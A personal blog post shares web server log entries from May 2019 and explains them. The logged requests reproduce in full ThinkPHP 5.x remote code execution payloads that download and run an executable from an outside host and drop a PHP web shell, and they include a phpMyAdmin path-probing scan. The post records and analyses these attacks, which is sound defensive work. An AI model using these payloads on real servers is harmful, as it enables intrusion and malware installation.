Looking through my web server logs I noticed some thoroughly suspicious requests, so, for the first time in a while, here they are.
[22/May/2019:22:06:49] - - 221.231.113.114 "GET /public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/leepozjimljusrb19143.exe');start%20%SystemRoot%/Temp/leepozjimljusrb19143.exe HTTP/1.1" 301 - "http://116.58.172.107:80/public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe
[22/May/2019:22:06:57] - - 221.231.113.114 "GET /public/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile(http://fid.hognoob.se/download.exe,%SystemRoot%/Temp/leepozjimljusrb19143.exe);start%20%SystemRoot%/Temp/leepozjimljusrb19143.exe HTTP/1.1" 404 24979 "http://116.58.172.107:80/public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe
[22/May/2019:22:07:04] - - 221.231.113.114 "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 301 - "http://116.58.172.107:80/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo
[22/May/2019:22:07:07] - - 221.231.113.114 "GET /public/?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20?php%20action%20=%20_GET[xcmd];system(action);?hydra.php HTTP/1.1" 404 24980 "http://116.58.172.107:80/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo
[22/May/2019:22:07:15] - - 221.231.113.114 "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/leepozjimljusrb19143.exe');start%20%SystemRoot%/Temp/leepozjimljusrb19143.exe HTTP/1.1" 404 24950 "http://116.58.172.107:80/public/hydra.php?xcmd=cmd.exe
The /public/index.php?s=index/think\app/invokefunction part is not about Windows shares: it is the well-known remote code execution against ThinkPHP 5.x (patched upstream in December 2018, in 5.0.23 and 5.1.31). The s= route parameter names the class \think\App (the backslashes are PHP namespace separators) and its invokefunction method, and the remaining parameters make it run call_user_func_array('system', [...]), i.e. an arbitrary shell command. What is Windows-specific is the command itself: cmd.exe /c powershell fetches download.exe from fid.hognoob.se into %SystemRoot%/Temp and starts it. The third and fourth requests try instead to drop a one-line web shell, hydra.php, by echoing a PHP snippet that calls system($_GET[xcmd]) (the ^ in ^> is the cmd.exe escape for the redirect; the <, > and $ characters appear to have been lost somewhere between the scanner and this log), and the fifth calls that shell with the same PowerShell download command. The 301 responses are this server redirecting /public/index.php to /public/; the retries against /public/, which also dropped the backslashes, simply got 404s.
The source address was, as expected, in China.
% Information related to '221.228.0.0/14AS4134'
route:          221.228.0.0/14
descr:          CHINANET jiangsu province network
origin:         AS4134
mnt-by:         MAINT-CHINANET-JS
last-modified:  2019-02-14T06:59:24Z
source:         APNIC
Requests like the following, on the other hand, come in all the time.
[21/May/2019:17:23:52] - - 118.31.251.34 "GET //scripts/setup.php HTTP/1.1" 301 - "-"
[21/May/2019:17:23:57] - - 118.31.251.34 "GET //phpMyAdm/scripts/setup.php HTTP/1.1" 301 - "-"
[21/May/2019:17:24:03] - - 118.31.251.34 "GET //admin/scripts/setup.php HTTP/1.1" 301 - "-"
[21/May/2019:17:24:09] - - 118.31.251.34 "GET //admin/pma/scripts/setup.php HTTP/1.1" 301 - "-"
[21/May/2019:17:24:15] - - 118.31.251.34 "GET //admin/phpmyadmin/scripts/setup.php HTTP/1.1" 301 - "-"
[21/May/2019:17:24:21] - - 118.31.251.34 "GET //db/scripts/setup.php HTTP/1.1" 301 - "-"
[21/May/2019:17:24:26] - - 118.31.251.34 "GET //dbadmin/scripts/setup.php HTTP/1.1" 301 - "-"
[21/May/2019:17:24:31] - - 118.31.251.34 "GET //dbdmin/scripts/setup.php HTTP/1.1" 301 - "-"
[21/May/2019:17:24:36] - - 118.31.251.34 "GET //myadmin/scripts/setup.php HTTP/1.1" 301 - "-"
[21/May/2019:17:24:41] - - 118.31.251.34 "GET //mysql/scripts/setup.php HTTP/1.1" 301 - "-"
[21/May/2019:17:24:45] - - 118.31.251.34 "GET //mysqladmin/scripts/setup.php HTTP/1.1" 301 - "-"
[21/May/2019:17:24:49] - - 118.31.251.34 "GET //typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 301 - "-"
[21/May/2019:17:24:52] - - 118.31.251.34 "GET //phpadmin/scripts/setup.php HTTP/1.1" 301 - "-"
[21/May/2019:17:24:56] - - 118.31.251.34 "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 301 - "-"
[21/May/2019:17:25:01] - - 118.31.251.34 "GET //phpmyadmin1/scripts/setup.php HTTP/1.1" 301 - "-"
[21/May/2019:17:25:07] - - 118.31.251.34 "GET //phpmyadmin2/scripts/setup.php HTTP/1.1" 301 - "-"
This one's source is, naturally, China as well.
% Information related to '118.31.0.0/16AS37963'
route:          118.31.0.0/16
descr:          Addresses from CNNIC
country:        CN
origin:         AS37963
mnt-by:         MAINT-CNNIC-AP
last-modified:  2016-07-20T02:08:05Z
source:         APNIC
None of this matters much, but I'm putting it on display anyway.